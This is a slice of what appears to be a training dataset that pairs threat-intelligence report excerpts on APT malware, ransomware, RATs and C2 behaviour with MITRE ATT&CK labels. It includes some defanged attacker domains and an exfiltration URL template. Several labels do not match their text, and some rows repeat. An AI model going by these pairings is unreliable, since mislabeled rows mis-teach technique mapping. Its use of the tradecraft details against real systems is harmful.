| 428 | 3, 2019): On May 16, 2019 FireEye's Advanced Practices team attributed the remaining "suspected APT33 activity" (referred to as GroupB in this blog post) to APT33, operating at the behest of the Iranian government. The actor leveraged this persistence mechanism to download and execute OS-dependent variants of the publicly available .NET POSHC2 backdoor as well as a newly identified PowerShell-based implant self-named POWERTON. Of note, Advanced Practices separately established that APT33 began using POSHC2 as of at least July 2, 2018, and continued to use it throughout the duration of 2018. At one point in late-August, after the POSHC2 kill date, the adversary used RULER.HOMEPAGE to directly download POWERTON, bypassing the intermediary stages previously observed. FireEye Intelligence has previously reported that APT33 has ties to destructive malware, and they pose a heightened risk to critical infrastructure. The operators behind each of the described intrusions are using publicly available but not widely understood tools and techniques in addition to proprietary implants as needed. Custom Backdoor: POWERTON . POWERTON is a backdoor written in PowerShell; FireEye has not yet identified any publicly available toolset with a similar code base, indicating that it is likely custom-built. FireEye has observed an increase in targeted adversaries challenging and subverting security controls on Exchange and Office365. At FireEye, our decisions are data driven, but data provided to us is often incomplete and missing pieces must be inferred based on our expertise in order for us to respond to intrusions effectively. Credential harvesting phishing scams, where harvested credentials may be sold, re-used, or documented permanently elsewhere on the internet | ['T1068 - Exploitation for Privilege Escalation'] | fine_tune |
| 429 | The malware sets its persistence mechanism by creating a RunKey in the registry to ensure its survival after system reboot events | ['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'] | fine_tune |
| 430 | Audio surveillance: The malware uses the NAudio library to interact with the microphone and manage the audio stream. The library is stored server-side and pushed to the victim’s machine using a special command. The bot will display the messages using a standard message box. The log includes the process name used by the victim, and keystrokes. The theft is performed by a specific component that enumerates credentials saved in various browsers. Process manager: The attacker can obtain a list of running processes and terminate these by using a specific button | ['T1123 - Audio Capture'] | fine_tune |
| 431 | HAYMAKER is a backdoor that can download and execute additional payloads in the form of modules. It also conducts basic victim profiling activity, collecting the computer name, running process IDs, %TEMP% directory path and version of Internet Explorer. It communicates encoded system information to a single hard coded command and control (C2) server, using the system’s default User-Agent string. BUGJUICE is a backdoor that is executed by launching a benign file and then hijacking the search order to load a malicious dll into it. BUGJUICE defaults to TCP using a custom binary protocol to communicate with the C2, but can also use HTTP and HTTPs if directed by the C2. It has the capability to find files, enumerate drives, exfiltrate data, take screenshots and provide a reverse shell. SNUGRIDE is a backdoor that communicates with its C2 server through HTTP requests. The malware’s capabilities include taking a system survey, access to the filesystem, executing commands and a reverse shell | ['T1059.003 - Command and Scripting Interpreter: Windows Command Shell'] | fine_tune |
| 432 | One of the custom tools used by the Leafminer group is a rebranded version of the widespread post-exploitation tool Mimikatz | ['T1083 - File and Directory Discovery'] | fine_tune |
| 433 | The default case when the service tag is empty allows the malware to treat the contents of the response from the C2 as a command to execute via the Go library functions os.exec.Command or os.exec.Start. The format of the received command is checked against the below regex pattern for validity before executing and the command is read from the body of the message received from the C2 | ['T1059.003 - Command and Scripting Interpreter: Windows Command Shell'] | fine_tune |
| 434 | In 2014, Imminent Monitor started supporting third-party plugins. The first of these offered the ability to turn the webcam light off while monitoring. Shockwave™ wrote: “Hey, good job on being the first to release a plugin for Imminent Monitor | ['T1125 - Video Capture'] | fine_tune |
| 435 | Where the number of passed parameters is one, the payload will read the sys.bin.url file from %appdata%\systemconfig. It will then spawns a new svchost process as C:\\windows\\system32\\svchost.exe –k update in suspended state and injects the payload. Finally, it patches the entry point of svchost.exe so it can execute the malicious payload after the ResumeThread call | ['T1055.012 - Process Injection: Process Hollowing'] | fine_tune |
| 436 | This module intercepts HWP documents on an infected computer. The HWP file format is similar to Microsoft Word documents, but supported by Hangul, a South Korean word processing application from the Hancom Office bundle. This malware module works independently of the others and maintains its own Bulgarian e-mail account. The account is hardcoded in the module along with the master’s e-mail to which it sends intercepted documents. It is interesting that the module does not search for all the HWP files on infected computer, but reacts only to those that are opened by the user and steals them. This behavior is very unusual for a document-stealing component and we do not see it in other malicious toolkits | ['T1005 - Data from Local System'] | fine_tune |
| 437 | In the old campaign the actor used TextBoxes to store its data while in the new one the content has been base64 encoded within the document content. In the new campaign JavaScript files have been used to execute batch and PowerShell files. The new campaign uses Powershell and URLMON API calls to download the cab file while in the old campaign it used certutil to download the cab file. The new campaign has used two different UAC bypass techniques based on the victim’s OS while in the old one the actor only used the Token Impersonation technique. In the new campaign the actor has developed a new variant of Konni RAT that is heavily obfuscated. Also, its configuration is encrypted and is not base64 encoded anymore. It also does not use FTP for exfiltration | ['T1041 - Exfiltration Over C2 Channel', 'T1140 - Deobfuscate/Decode Files or Information'] | fine_tune |
| 438 | TEARDROP is a memory only dropper that runs as a service, spawns a thread and reads from the file “gracious_truth.jpg”, which likely has a fake JPG header. TEARDROP does not have code overlap with any previously seen malware. We believe that this was used to execute a customized Cobalt Strike BEACON | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 439 | The adversary used the built-in lateral movement possibilities in Cobalt Strike. Cobalt Strike has various methods for deploying its beacons at newly compromised systems. We have seen the adversary using SMB, named pipes, PsExec, and WinRM. They continue lateral movement and discovery in an attempt to identify the data of interest | ['T1021.006 - Remote Services: Windows Remote Management'] | fine_tune |
| 440 | It is used by the financially motivated GOLD SOUTHFIELD threat group, which distributes ransomware via exploit kits, scan-and-exploit techniques, RDP servers, and backdoored software installers. CTU™ researchers attribute GandCrab to the GOLD GARDEN threat group | ['T1190 - Exploit Public-Facing Application', 'T1133 - External Remote Services'] | fine_tune |
| 441 | CWS or WSA web scanning prevents access to malicious websites, including watering hole attacks, and detects malware used in these attacks | ['T1189 - Drive-by Compromise'] | fine_tune |
| 442 | The attackers typically distribute Netwalker ransomware with the use of a reflective PowerShell loader script that has been protected from casual analysis with several layers of obfuscation | ['T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1027 - Obfuscated Files or Information'] | fine_tune |
| 443 | BRONZE UNION appears to use a combination of self-registered IP addresses and commercial VPN services in its command and control (C2) and operational infrastructure. The threat actors also integrate infrastructure they likely previously compromised for espionage purposes. For example, CTU researchers identified the group using IP addresses owned by several, presumably compromised, research organizations to interact with web shells in other target environments | ['T1003.002 - OS Credential Dumping: Security Account Manager', 'T1003.004 - OS Credential Dumping: LSA Secrets'] | fine_tune |
| 444 | As mentioned previously, this backdoor also supports loading plugins. The server creates a thread that searches for files matching the following pattern lPH*.dll. If such a file exists, it is loaded and its export function ModuleStart is called. Among the various plugins we have located so far, one is able to steal recent files and files from USB thumb drives | ['T1025 - Data from Removable Media', 'T1083 - File and Directory Discovery'] | fine_tune |
| 445 | Phishing emails continued to use links to external ZIP or RAR archives, which ultimately contained an executable with the extension SCR. The attackers also made extensive use of Hostinger’s cheap web hosting services to deliver initial payloads | ['T1204.001 - Malicious Link'] | fine_tune |
| 446 | After decrypting the C&C server address, the shellcode proceeds to send an HTTP GET request to fetch the resource: “msdn.cpp” on the server | ['T1071.001 - Application Layer Protocol: Web Protocols'] | fine_tune |
| 447 | The purpose of the bytecode is to decrypt the embedded payload, load it into memory reflectively and execute it | ['T1140 - Deobfuscate/Decode Files or Information'] | fine_tune |
| 448 | The backdoor contain narrow capabilities: download and upload files, run commands and send the attackers the results. However short the list, they allow the attackers to upload and execute additional tools for further reconnaissance and lateral movement | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 449 | Network analysis — run one of the plugins to retrieve Active Directory and network information (Fig | ['T1016 - System Network Configuration Discovery'] | fine_tune |
| 450 | Before running the above command to open the decoy document, the shellcode enumerates the running processes on the system, specifically looking for processes created for an executable with a filename that starts with “avp. presumably in an attempt to find Kaspersky’s antivirus process. If the process is found, the shellcode will not open the decoy document and exits | ['T1057 - Process Discovery'] | fine_tune |
| 451 | This RAT is also known for its keylogging and file transfer functionality. As such, any remote attacker can load any files onto the infected machine or even steal documents | ['T1036.005 - Masquerading: Match Legitimate Name or Location', 'T1105 - Ingress Tool Transfer'] | fine_tune |
| 452 | The malware will setup the miner and then the miner will persist it in the system in two ways: 1) by adding itself as a service if the malware gains admin privileges or 2) by adding the batch file to the startup folder | ['T1543.003 - Create or Modify System Process: Windows Service'] | fine_tune |
| 453 | Registered and active during late June 2020, newspointview[.]com has been used with more recent SombRAT variants as the primary C2 domain | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 454 | An example of these tasks is shown below: • write a file and execute it with CreateProcess() capturing all of the standard output • update C&C configuration, plugin storage, etc • update autoruns • write arbitrary files to the filesystem (“File Upload”) • read arbitrary files from the filesystem (“File Download”) • update itself • uninstall • push task results to C2 servers | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 455 | Exploits a kernel privilege escalation vulnerability to gain SYSTEM privileges using CVE-2018-8453. Whitelists files, folders and extensions from encryption. Encrypts files on local and network storage. Customizes the name and body of the ransom note, and the contents of the background image. Exfiltrates encrypted information on the infected host to remote controllers. REvil uses Hypertext Transfer Protocol Secure (HTTPS) for communication with its controllers | ['T1486 - Data Encrypted for Impact'] | fine_tune |
| 456 | In the old campaign the actor used TextBoxes to store its data while in the new one the content has been base64 encoded within the document content. In the new campaign JavaScript files have been used to execute batch and PowerShell files. The new campaign uses Powershell and URLMON API calls to download the cab file while in the old campaign it used certutil to download the cab file. The new campaign has used two different UAC bypass techniques based on the victim’s OS while in the old one the actor only used the Token Impersonation technique. In the new campaign the actor has developed a new variant of Konni RAT that is heavily obfuscated. It also does not use FTP for exfiltration | ['T1059.001 - Command and Scripting Interpreter: PowerShell'] | fine_tune |
| 457 | Once you have set up the database and logged into the BloodHound web application, you need to pull AD data from your environment using the BloodHound PowerShell ingestor. Figure 1 shows a sample command that searches all domains in the forest (-SearchForest) and the folder location used to save the resulting CSV files | ['T1059.001 - Command and Scripting Interpreter: PowerShell'] | fine_tune |
| 458 | If the DoublePulsar backdoor does not exist, then the SMB worm attempts to compromise the target using the Eternalblue SMBv1 exploit. After the first thread determines the local network subnet, the SMB worm scans local addresses beginning at the start of the netblock and increasing by one to the end of the netblock | ['T1016 - System Network Configuration Discovery'] | fine_tune |
| 459 | This Unix binary is widely used by many malware families to determine the device’s unique ID (for campaign tracking), usually in the form of the machine’s serial number. This may or may not be hashed with another utility (e.g. md5) before being sent to the C2. To facilitate anti-analysis and evasion, ioreg is also used by some threat actors to determine whether the device is running in a virtual environment | ['T1497.001 - Virtualization/Sandbox Evasion: System Checks'] | fine_tune |
| 460 | It uses a GetCurrentProcessID to find the process ID of the current process. It compares the UniqueProcessID member of the SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX structure with the current process ID | ['T1057 - Process Discovery'] | fine_tune |
| 461 | Encryption is definitely the simplest method to hide the C&C server. We have encountered cases where the port has been stored in the data section, in the Delphi form data, or randomly chosen from a range | ['T1102.001 - Dead Drop Resolver'] | fine_tune |
| 462 | The Helminth implant is routinely delivered through macro-enabled Microsoft Office documents requiring user interaction to execute an obfuscated Visual Basic Script | ['T1204.002 - User Execution: Malicious File'] | fine_tune |
| 463 | 1) The malicious macro scans the victim’s Outlook inbox and looks for the strings “$$cpte” and “$$ecpte”. 2) Then the macro will open a CMD shell that will execute whatever instruction / command is in between the strings. 4) The macro searches for the special strings in the “Deleted Items” folder to find the attacker’s email address and sends the data back to the attackers via email. 5) Lastly, the macro will delete any evidence of the emails received or sent by the attackers | ['T1566.001 - Phishing: Spearphishing Attachment'] | fine_tune |
| 464 | A recent lull in the distribution of spam spreading information-stealing malware via the Hancitor downloader has been snapped | ['T1566.002 - Phishing: Spearphishing Link'] | fine_tune |
| 465 | There are three types of URLs present in the decrypted configuration. The first type of URL listed in the configuration data is used for the plain HTTP (that is, non-Tor) communication with C&C servers. The bot reports to the C&C server using the typical request pattern: for example, the initial checkin to the C&C server is in the form of: cfg_url + “/images/” + encoded_data + (.jpeg||.gif||.bmp | ['T1132 - Data Encoding'] | fine_tune |
| 466 | Similar to many other ransomware operators, CARBON SPIDER not only encrypted victim files using Darkside, but also exfiltrated data for publication on a dedicated leak site (DLS) hosted on Tor. For exfiltration, CARBON SPIDER primarily leveraged the MEGASync client for hosting provider MEGA but also employed GoToAssist | ['T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage'] | fine_tune |
| 467 | They stop the Volume Shadow Copy service; the ransomware itself includes a command to delete existing shadow copies | ['T1490 - Inhibit System Recovery'] | fine_tune |
| 468 | Emotet artifacts are typically found in arbitrary paths located off of the AppData\Local and AppData\Roaming directories. Persistence is typically maintained through Scheduled Tasks or via registry keys. Additionally, Emotet creates randomly-named files in the system root directories that are run as Windows services | ['T1053.005 - Scheduled Task/Job: Scheduled Task'] | fine_tune |
| 469 | The backdoor also creates a separate thread that installs a Windows hook procedure on message WH_KEYBOARD_LL, through which it can intercept keystrokes. We believe this is mainly used to intercept credentials from other browsers, specifically Google Chrome | ['T1056.001 - Input Capture: Keylogging'] | fine_tune |
| 470 | Kimsuky is a highly motivated APT that has traditionally targeted entities in South Korea. The APT group has used a variety of malware such as Gold Dragon, Babyshark and Appleseed to target entities ranging from defense to education and think tanks. Some file enumerators will exfiltrate all files with specific extensions. What's interesting here, however, is that the attackers knew exactly which files they were looking for | ['T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage'] | fine_tune |
| 471 | The Trojan obfuscates its executable code prior to compilation, rather than packing it like most other ransomware, making it harder for researchers to reverse engineer and analyze the malicious code. It also obscures the links to the necessary API function, and stores hashes to strings rather than the actual strings. Upon installation, the Trojan reviews the directory its executable is started from, and if it spots an attempt to launch it from an ‘incorrect’ directory – such as a potential automated sandbox – it exits. Before encrypting files on a victim device, SynAck checks the hashes of all running processes and services against its own hard coded list. If it finds a match, it tries to kill the process | ['T1083 - File and Directory Discovery', 'T1497.001 - Virtualization/Sandbox Evasion: System Checks'] | fine_tune |
| 472 | Before being sent to the server, the data structure has to pass through shaping as shown in Fig | ['T1560 - Archive Collected Data'] | fine_tune |
| 473 | When the backdoor is configured to use HTTPS to communicate with the C2, the functionality is largely the same as when in HTTP mode. The differences are that it lacks the options to update a session key due to encryption being handled by the TLS layer and it also does not have the option to send data to and from the C2 in the chunking mode previously described. In addition, only one transmission is made to the C2 when the malware is establishing a connection as there is no exchange of an AES session key. The hello message that is sent contains the same plaintext data as the HTTP mode | ['T1071.001 - Application Layer Protocol: Web Protocols'] | fine_tune |
| 474 | For persistence and remote control, the script downloads another base64-encoded Python script from hxxps://ptpb[.]pw/OAZG. After several steps of de-obfuscation, we found the attackers using EmPyre for post-exploitation control | ['T1027 - Obfuscated Files or Information'] | fine_tune |
| 475 | The Magic Hound campaign used Word and Excel documents containing malicious macros as a delivery method, specifically attempting to load either the Pupy RAT or meterpreter which we have called MagicHound.Rollover. The malicious macros were all designed to use Windows PowerShell to download a shellcode-based payload from a remote server. We discovered two different techniques used in the PowerShell scripts, the first being a straightforward execute command of a string retrieved from the remote server. The second technique appeared to be from a tool called Magic Unicorn, an open source module for meterpreter. Specifically, we discovered code in the PowerShell script that was a match for code in Magic Unicorn containing the comment “one line shellcode injection with native x86 shellcode | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 476 | Throughout the year, Volexity identified multiple Vietnamese-language news websites that appeared to be compromised, as they were being used to load an OceanLotus web profiling framework. The exact functionality varied from site to site, but the goal of these frameworks was to gather information about site visitors and, in some cases, deliver malware. This code appears to be a variation of what Volexity has previously described as Framework A | ['T1583.001 - Domains'] | fine_tune |
| 477 | For example, here is a folder and a list of files created by picking the C:\Windows\system32\TCPSVCS.exe executable as a source of data | ['T1543.003 - Create or Modify System Process: Windows Service'] | fine_tune |
| 478 | The attackers used both families concurrently from late last year through November 2017 and there is some C2 infrastructure overlap between the two families, as well as links to historical reporting. Reaver Malware Analysis To date, Palo Alto Networks Unit 42 has identified 10 unique samples and three distinct variants of a new malware family we have named “Reaver”. As such, we identify each variant as Reaver.v1, Reaver.v2, and Reaver.v3. Reaver.v1 has been observed delivering a payload that uses HTTP for network communication, while versions 2 and 3 use a payload that uses raw TCP connections for this communication. The flow for Reaver is as shown | ['T1071.001 - Application Layer Protocol: Web Protocols', 'T1095 - Non-Application Layer Protocol'] | fine_tune |
| 479 | Another payload of the Ecipekac loader, which we call SodaMaster (a.k.a DelfsCake), is also a new fileless malware. In our research we found more than 10 samples of SodaMaster. The only differences were in the configuration data, including a hardcoded C2, an encoded RSA key and additional data for calculating a mutex value | ['T1105 - Ingress Tool Transfer', 'T1573.002 - Asymmetric Cryptography'] | fine_tune |
| 480 | When executed, the DLL drops and launches using a WinExec API call. This stage of the Valak malware uses a malicious JavaScript file with a random name that changes per execution | ['T1218.010 - Signed Binary Proxy Execution: Regsvr32'] | fine_tune |
| 481 | The script modifies Windows Defender settings to exclude the target logical drive it is going to wipe from scheduled and real-time scanning | ['T1059.005 - Command and Scripting Interpreter: Visual Basic'] | fine_tune |
| 482 | MSTIC has observed NICKEL actors using exploits against unpatched systems to compromise remote access services and appliances. Upon successful intrusion, they have used credential dumpers or stealers to obtain legitimate credentials, which they used to gain access to victim accounts. NICKEL actors created and deployed custom malware that allowed them to maintain persistence on victim networks over extended periods of time. MSTIC has also observed NICKEL perform frequent and scheduled data collection and exfiltration from victim networks | ['T1016 - System Network Configuration Discovery', 'T1119 - Automated Collection', 'T1587.001 - Malware', 'T1078 - Valid Accounts'] | fine_tune |
| 483 | To load the driver, a new service is created using the API CreateServiceW. The name and display name for this service is the 4-character name used for the file name. Next, StartServiceW is called in a loop five times to ensure the driver is loaded. Immediately after the driver is loaded, the service is removed by deleting the entire registry key | ['T1106 - Native API', 'T1543.003 - Create or Modify System Process: Windows Service'] | fine_tune |
| 484 | Once the attackers identify the files of interest, the module is instrumented for exfiltration of the files.The VBScript-based file recon module used by the attackers is somewhat different. The URL constructed had the following format:http://<attacker_controlled_domain/>report.php | ['T1071.001 - Application Layer Protocol: Web Protocols'] | fine_tune |
| 485 | Between 2016 and 2020, we have seenScreenConnect and Onehub used in malicious cyber activity by different, unassociated threat actors. For example, between 2016 and 2019 unknown threat actors targeted IT outsourcing firms, including compromising US-based Cognizant and India-based Wipro. 7] The actors responsible for these attacks used ScreenConnect to connect to endpoints on client networks, enabling them to conduct further lateral movements and automated actions on objectives. During an incident impacting Cognizant and their client Maritz Holdings, actors used ScreenConnect to propagate to other connected systems and caused over $1.8 million (USD) in losses through a gift card fraud scheme. 6] In 2019, another threat group used ConnectWise to execute PowerShell commands in their target environments. 7] In 2020, ScreenConnect/ConnectWise has been utilized by the cybercriminal group Pinchy Spider (GOLD SOUTHFIELD, GOLD GARDEN, Sodinokibi, REvil, GandCrab) to distribute Sodinokibi ransomware | ['T1059.001 - Command and Scripting Interpreter: PowerShell'] | fine_tune |
| 486 | Stage 1: A Master Boot Record (MBR) locker used to overwrite the operating system's MBR, which effectively prevents the operating system from loading successfully - Stage 2: A disk-wiper used to wipe and destroy files on the target machine | ['T1561.002 - Disk Structure Wipe'] | fine_tune |
| 487 | The MuddyWaters group has carried out a large number of attacks and demonstrated advanced social engineering, in addition to the active development of attacks, infrastructure and the use of new methods and techniques | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 488 | BADNEWS Much of BADNEWS has remained consistent from when it was originally discussed by Forcepoint in August 2016. To briefly recap, the BADNEWS malware family acts as a backdoor, with communication occurring over HTTP. A number of commands are provided to the attackers, including the ability to download and execute additional information, upload documents of interest, and take screenshots of the desktop. This tactic uses public web services to host content that contains encoded commands that are decoded by the malware | ['T1113 - Screen Capture'] | fine_tune |
| 489 | As we can see, it simply downloads a file from secure.dropinbox[.]pw using HTTP on port 443 (not HTTPS), and proceeds to decrypt the file using AES-128 prior to executing it. At this point, Cardinal RAT has been downloaded and executed, and execution is directed to this sample. Of course, the Carp Downloader is not required to download Cardinal RAT, however, based on our visibility, it has exclusively done so | ['T1105 - Ingress Tool Transfer', 'T1071.001 - Application Layer Protocol: Web Protocols'] | fine_tune |
| 490 | Many fields in the installation program are forged into Acrobat Reader installation program, and the interface after running is related to Acrobat Reader | ['T1036.005 - Masquerading: Match Legitimate Name or Location'] | fine_tune |
| 491 | The use of the legitimate regsvr32.exe application to run a .sct file is an AppLocker bypass technique originally discovered by Casey Smith (@subtee), which eventually resulted in a Metasploit module. The WINDOWSTEMP.ps1 script is a dropper that decodes an embedded executable using base64 and decompresses it with the System.IO.Compression.GzipStream object. The WindowsTemplate.exe executable is a new variant of RogueRobin written in C | ['T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1218.010 - Signed Binary Proxy Execution: Regsvr32', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1140 - Deobfuscate/Decode Files or Information', 'T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification'] | fine_tune |
| 492 | Juniper Threat Labs has been monitoring a campaign that pushes a new IcedID banking trojan. This new campaign changes tactics by injecting into msiexec.exe to conceal itself and use full steganography for downloading its modules and configurations. Previous versions of IcedID injected into svchost.exe and downloaded encrypted modules and config as “.dat” files. IcedID is a banking malware that performs Man-in-the-Browser attacks to steal financial information | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 493 | Execution through API (Batch file for example). - Application processes discovery with some procedures as the hashes of the name, and directly for the name of the process. File and directory discovery: to search files to encrypt. Encrypt files. Create files | ['T1486 - Data Encrypted for Impact'] | fine_tune |
| 494 | The malware uses at least three separate encryption methods for its traffic, depending on the type of message. The first method, implemented within HTTPDLL.dll, is used for the decryption of values and traffic relating to the HTTP GET requests (i) and (ii) discussed above. It appears to use an implementation of AES to encrypt the data which is then transmitted in its encrypted format. The key (shown in the image below) is apparently static, at least among the samples tested, and generated by drawing byte values from multiple parts of the binary and performing a number of bitwise operations on them | ['T1132.001 - Data Encoding: Standard Encoding', 'T1573.001 - Symmetric Cryptography'] | fine_tune |
| 495 | 1) The script uses the function fromCharCode() that returns a string created from a sequence of UTF-16 code units. By using this function, it avoids explicitly writing commands it wants to execute and it hides the actual code it is initiating. In particular, the script uses this function to hide information related to process names. To the best of our knowledge, this method was not used in early versions of the spam campaign. 2) The script uses the function radador(), which returns a randomized integer. This function is able to obfuscate code so that every iteration of the code is presented differently. In contrast to the first method of obfuscation, this has been used effectively since early versions of the Astaroth Trojan campaign | ['T1027 - Obfuscated Files or Information'] | fine_tune |
| 496 | Implant Type – WaterBear is a stage-2 implant with many capabilities; BendyBear is a stage-0 downloader | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 497 | Monday, February 12, 2018 . Olympic Destroyer Takes Aim At Winter Olympics . This blog post is authored by Warren Mercer and Paul Rascagneres. Olympic Destroyer Workflow . Initial stage . The initial edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9 sample is a binary that, when executed, drops multiple files on to the victim host. SQLite is embedded in the sample: . System Credential Stealer . In additional to the browsers credential stealer, Olympic Destroyer drops and executes a system stealer. This step is executed to ensure that file recovery is not trivial - WBAdmin can be used to recover individual files, folders and also whole drives so this would be a very convenient tool for a sysadmin to use in order to aid recovery. Additionally, the destroyer disables all the services on the system: The malware uses the ChangeServiceConfigW API to change the start type to 4 which means: "Disabled: Specifies that the service should not be started. Legitimate File . Additionally, the Olympic Destroyer drops the legitimate, digitally signed, PsExec file in order to perform lateral movement by using this legitimate tool from Microsoft. Using legitimate tools like PsExec will save the adversary time from writing their own tooling. Disruption is the clear objective in this type of attack and it leaves us confident in thinking that the actors behind this were after embarrassment of the Olympic committee during the opening ceremony. Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors. categories . Subscribe To Our Feed . Blog Archive . - - - - - - - - - - - - ▼ February (14) CannibalRAT targets Brazil Who Wasn’t Responsible for Olympic Destroyer | ['T1021.002 - Remote Services: SMB/Windows Admin Shares'] | fine_tune |
| 498 | SOMBRAT evades forensic analysis by patching the process memory used to record command line arguments. It replaces the initial command line with the base filename of the program executable, removing any arguments. This means that investigators that inspect a process listing via memory forensics will see the innocuous-looking command line `powershell.exe` rather than references to the uncommon filename such as `WwanSvc.c | ['T1057 - Process Discovery', 'T1564.010 - Process Argument Spoofing'] | fine_tune |
| 499 | POWRUNER may also receive batch commands from the C2 server to collect host information from the system | ['T1083 - File and Directory Discovery', 'T1057 - Process Discovery', 'T1047 - Windows Management Instrumentation', 'T1049 - System Network Connections Discovery', 'T1016 - System Network Configuration Discovery', 'T1082 - System Information Discovery', 'T1033 - System Owner/User Discovery'] | fine_tune |
| 500 | The 0x1 bit in the control flags is used in this module to specify if the download should be done via HTTPS | ['T1071.001 - Application Layer Protocol: Web Protocols'] | fine_tune |
| 501 | TeamTNT targets exposed Docker API to deploy malicious images. Docker images containing TeamTNT malware are being hosted in public Docker repos via account takeovers. TeamTNT leverages exposed Docker hub secrets within GitHub to stage malicious Docker images. The following MITRE ATT&CK techniques were observed: Deploy Container (T1610), User Execution: Malicious Image (T1204.003), Unsecured Credentials: Credentials In Files (T1552.002), Implant Internal Image (T1525), and Valid Accounts: Cloud Accounts (T1078.004 | ['T1204.003 - User Execution: Malicious Image'] | fine_tune |
| 502 | Crutch is able to bypass some security layers by abusing legitimate infrastructure – here Dropbox – in order to blend into normal network traffic while exfiltrating stolen documents and receiving commands from its operators | ['T1102.002 - Bidirectional Communication'] | fine_tune |
| 503 | Some of the executables pack the collected data into a password protected archive and save it to the disk, while others send the data to the C&C server directly | ['T1074.001 - Data Staged: Local Data Staging', 'T1560 - Archive Collected Data'] | fine_tune |
| 504 | Woburn, MA – May 7, 2018 – Kaspersky Lab researchers have discovered a new variant of the SynAck ransomware Trojan using the Doppelgänging technique to bypass anti-virus security by hiding in legitimate processes. The developers behind SynAck also implement other tricks to evade detection and analysis, obfuscating all malware code prior to sample compilation and exiting if signs suggest it is being launched in a sandbox | ['T1027 - Obfuscated Files or Information'] | fine_tune |
| 505 | Monday, February 12, 2018 . Olympic Destroyer Takes Aim At Winter Olympics . This blog post is authored by Warren Mercer and Paul Rascagneres. The Guardian, a UK Newspaper reported an article that suggested the Olympic computer systems suffered technical issues during the opening ceremony. The destructive nature of this malware aims to render the machine unusable by deleting shadow copies, event logs and trying to use PsExec & WMI to further move through the environment. Olympic Destroyer Workflow . Initial stage . The initial edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9 sample is a binary that, when executed, drops multiple files on to the victim host. Dropped Files . Browser Credential Stealer . Olympic Destroyer drops a browser credential stealer. SQLite is embedded in the sample: . System Credential Stealer . In additional to the browsers credential stealer, Olympic Destroyer drops and executes a system stealer. The stealer attempts to obtain credentials from LSASS with a technique similar to that used by Mimikatz. Additionally, the destroyer disables all the services on the system: The malware uses the ChangeServiceConfigW API to change the start type to 4 which means: "Disabled: Specifies that the service should not be started. Legitimate File . Additionally, the Olympic Destroyer drops the legitimate, digitally signed, PsExec file in order to perform lateral movement by using this legitimate tool from Microsoft. Disruption is the clear objective in this type of attack and it leaves us confident in thinking that the actors behind this were after embarrassment of the Olympic committee during the opening ceremony | ['T1070.001 - Indicator Removal on Host: Clear Windows Event Logs'] | fine_tune |
| 506 | The dropper then decrypts the ciphertext by using an XOR cipher and a specific base64 encode string that is decoded and used as the key. Before accessing the ciphertext, the dropper subtracts 14 from the specified offset, which is the same as previous Disttrack samples delivered in Shamoon 2 attacks. Tables 1, 2, and 3 include the resources, the information used to extract them, and the resulting module | ['T1078.002 - Domain Accounts'] | fine_tune |
| 507 | We see it clustered here with some dynamic domain name system (DNS) domains. Dynamic DNS domains were observed in this cluster on later IP addresses as well, though this technique appears to have fallen out of favor, at least in this context, since there are none in this cluster currently active | ['T1568 - Dynamic Resolution'] | fine_tune |
| 508 | Regarding to downloading and executing a tool, Flagpro stores the downloaded file in file path “%Temp%\~MY[0-9A-F].tmp” first. Then, Flagpro adds extension “.exe” to the name of stored file and executes the file | ['T1036 - Masquerading'] | fine_tune |
| 509 | Because TA505 is such a significant part of the email threat landscape, this blog provides a retrospective on the shifting malware, payloads, and campaigns associated with this actor. We examine their use malware such as Jaff, Bart, and Rockloader that appear to be exclusive to this group as well as more widely distributed malware like Dridex and Pony. Where possible, we detail the affiliate models with which they are involved and outline the current state of TA505 campaigns | ['T1486 - Data Encrypted for Impact'] | fine_tune |
| 510 | In the example, the POWRUNER client sends a random GET request to the C2 server and the C2 server sends the random number (99999999990) as a response. As the response is a random number that ends with ‘0’, POWRUNER sends another random GET request to receive an additional command string. The C2 server sends back Base64 encoded response | ['T1132.001 - Data Encoding: Standard Encoding'] | fine_tune |
| 511 | Using valid credentials, CARBON SPIDER moves laterally through victim environments using RDP and occasionally SSH. The adversary typically uses PS to run Cobalt Strike but occasionally writes Cobalt Strike stagers or KillACK backdoors to disk. Occasionally, CARBON SPIDER has deployed the legitimate GoToAssist or TightVNC tools to provide redundant control of hosts | ['T1021.005 - Remote Services:VNC', 'T1021.001 - Remote Services: Remote Desktop Protocol', 'T1021.004 - Remote Services: SSH'] | fine_tune |
| 512 | The test plugin attempts to connect to a provided address to check access to the network. Meanwhile, the reverse P2P plugin creates a proxy server to bridge the C&C and the client. This creates another connection to another C&C specified in the commands to act as a proxy, redirecting traffic from the infected machine to the real C&C server | ['T1090.002 - External Proxy'] | fine_tune |
| 513 | This adversary group is most commonly associated with a custom PowerShell implant identified as Helminth. The Helminth implant is routinely delivered through macro-enabled Microsoft Office documents requiring user interaction to execute an obfuscated Visual Basic Script | ['T1059.001 - Command and Scripting Interpreter: PowerShell'] | fine_tune |
| 514 | In the old campaign the actor used TextBoxes to store its data while in the new one the content has been base64 encoded within the document content. In the new campaign JavaScript files have been used to execute batch and PowerShell files. The new campaign uses Powershell and URLMON API calls to download the cab file while in the old campaign it used certutil to download the cab file. The new campaign has used two different UAC bypass techniques based on the victim’s OS while in the old one the actor only used the Token Impersonation technique. In the new campaign the actor has developed a new variant of Konni RAT that is heavily obfuscated | ['T1105 - Ingress Tool Transfer'] | fine_tune |
